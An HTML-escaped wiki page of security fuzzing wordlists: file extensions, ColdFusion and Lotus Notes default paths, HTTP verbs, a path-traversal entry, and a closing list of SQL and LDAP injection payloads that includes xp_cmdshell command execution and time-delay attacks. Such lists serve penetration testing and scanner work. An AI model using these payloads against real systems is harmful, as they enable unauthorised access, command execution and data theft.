.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
